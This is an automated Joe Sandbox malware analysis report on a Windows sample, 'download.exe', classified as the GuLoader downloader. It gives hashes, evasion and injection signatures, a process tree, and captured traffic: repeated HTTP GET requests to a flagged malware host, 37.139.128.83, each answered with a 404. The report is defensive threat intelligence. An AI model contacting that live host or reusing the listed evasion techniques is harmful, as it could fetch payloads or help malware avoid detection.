Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.exe

Overview

General Information

Sample Name:download.exe
Analysis ID:830512
MD5:064fa36da0c2ca360b0906cc5bfe67c6
SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • download.exe (PID: 8540 cmdline: C:\Users\user\Desktop\download.exe MD5: 064FA36DA0C2CA360B0906CC5BFE67C6)
    • CasPol.exe (PID: 924 cmdline: C:\Users\user\Desktop\download.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: download.exe PID: 8540JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://37.139.128.83/2-2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2kAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2DataAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2MAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2W7Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2R2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2eAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/lAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2gsLMEM8Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2$2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/262hkAvira URL Cloud: Label: malware
          Source: download.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004026FE FindFirstFileA,
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00406280 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:16:46 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:16:56 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:07 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:17 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:27 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:37 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:47 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:57 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
